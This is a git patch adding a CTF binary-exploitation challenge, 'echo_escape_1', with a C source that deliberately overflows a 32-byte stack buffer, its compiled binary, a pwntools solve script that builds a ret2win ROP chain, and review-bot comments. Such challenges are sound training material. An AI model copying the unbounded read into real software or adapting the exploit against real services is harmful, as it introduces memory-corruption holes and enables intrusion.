From 6b0551428516a9d83bec5e13244513436e83ce1d Mon Sep 17 00:00:00 2001
From: h7x4
Date: Thu, 2 Jul 2026 08:24:29 +0900
Subject: [PATCH] pwn/echo_escape_1
---
pwn/echo_escape_1/flag.txt | 1 +
pwn/echo_escape_1/solve.py | 33 +++++++++++++++++++++++++++++++++
pwn/echo_escape_1/vuln | Bin 0 -> 17144 bytes
pwn/echo_escape_1/vuln.c | 34 ++++++++++++++++++++++++++++++++++
4 files changed, 68 insertions(+)
create mode 100644 pwn/echo_escape_1/flag.txt
create mode 100755 pwn/echo_escape_1/solve.py
create mode 100755 pwn/echo_escape_1/vuln
create mode 100644 pwn/echo_escape_1/vuln.c
diff --git a/pwn/echo_escape_1/flag.txt b/pwn/echo_escape_1/flag.txt
new file mode 100644
index 0000000..7f34d3c
--- /dev/null
+++ b/pwn/echo_escape_1/flag.txt
@@ -0,0 +1 @@
+picoCTF{dummy}
diff --git a/pwn/echo_escape_1/solve.py b/pwn/echo_escape_1/solve.py
new file mode 100755
index 0000000..0cf8314
--- /dev/null
+++ b/pwn/echo_escape_1/solve.py
@@ -0,0 +1,33 @@
+#!/usr/bin/env nix-shell
+#!nix-shell -i python3 -p "python3.withPackages (ppkgs: with ppkgs; [ pwntools ])"
+
+from pwn import *
+
+exe = ELF("./vuln")
+
+context.binary = exe
+
+ADDR, PORT, *_ = "mysterious-sea.picoctf.net 50726".split()
+
+def conn():
+ if args.REMOTE:
+ r = remote(ADDR, PORT)
+ else:
+ r = process([exe.path])
+
+ return r
+
+def main():
+ r = conn()
+ r.recvuntil(b'Please enter your name: ').decode()
+
+ offset = 0x28
+ rop = ROP(exe)
+ rop.raw(rop.generatePadding(0, offset))
+ rop.win()
+ r.sendline(rop.chain())
+ print(r.recvline_contains(b'picoCTF').decode())
+ r.close()
+
+if __name__ == "__main__":
+ main()
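Review bot: In solve.py's main(), `r.close()` is only reached on the success path, so the tube (and the local child process) is left open whenever a receive raises, for example an EOFError if the target exits before a line containing `picoCTF` arrives. Wrapping the body in `try:` / `finally: r.close()` closes it on every path. The `.decode()` on `r.recvuntil(b'Please enter your name: ')` is applied to a value that is then discarded and can be dropped. `ADDR, PORT` hard-code what looks like a per-instance challenge endpoint, and `offset = 0x28` is tied to the committed `vuln` build; a short comment on each, e.g. `# instance endpoint, expires with the challenge instance`, would keep a later reader from trusting stale values.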
diff --git a/pwn/echo_escape_1/vuln b/pwn/echo_escape_1/vuln new file mode 100755 index 0000000000000000000000000000000000000000..f648bdc4313cd9263ba95a45ce0bc2d0657890b3 GIT binary patch literal 17144 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 OGcYj7qiI0nG5`Q@gRi&% literal 0 HcmV?d00001 diff --git a/pwn/echo_escape_1/vuln.c b/pwn/echo_escape_1/vuln.c new file mode 100644 index 0000000..e5766ba --- /dev/null +++ b/pwn/echo_escape_1/vuln.c 
@@ -0,0 +1,34 @@
+
+#include
+#include
+#include
+
+void win() {
+ FILE *fp = fopen("flag.txt", "rb");
+ if (!fp) {
+ perror("[!] Failed to open flag.txt");
+ return;
+ }
+
+ char buffer[128];
+ size_t n = fread(buffer, 1, sizeof(buffer), fp);
+ fwrite(buffer, 1, n, stdout);
+ fflush(stdout);
+ printf("\n");
+ fclose(fp);
+}
+
+int main() {
+ char buf[32];
+
+ printf("Welcome to the secure echo service!\n");
+ printf("Please enter your name: ");
+ fflush(stdout);
+
+ read(0, buf, 128);
+
+ printf("Hello, %s\n", buf);
+ printf("Thank you for using our service.\n");
+
+ return 0;
+}
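Review bot: In main(), `read(0, buf, 128)` can write up to 128 bytes into `char buf[32]`, and the following `printf("Hello, %s\n", buf)` treats the result as a C string although read() never NUL-terminates it and its return value is ignored. Since this is a challenge source the overflow is presumably intentional, so a comment above the call such as `/* intentional challenge bug: length exceeds sizeof(buf) */` would keep it from being copied as a pattern. Outside a challenge the bounded form is `ssize_t n = read(0, buf, sizeof(buf) - 1);` followed by `if (n < 0) return 1;` and `buf[n] = '\0';`. The three `#include` lines show no header names on this page, so it cannot be confirmed from here that the header declaring read() is included.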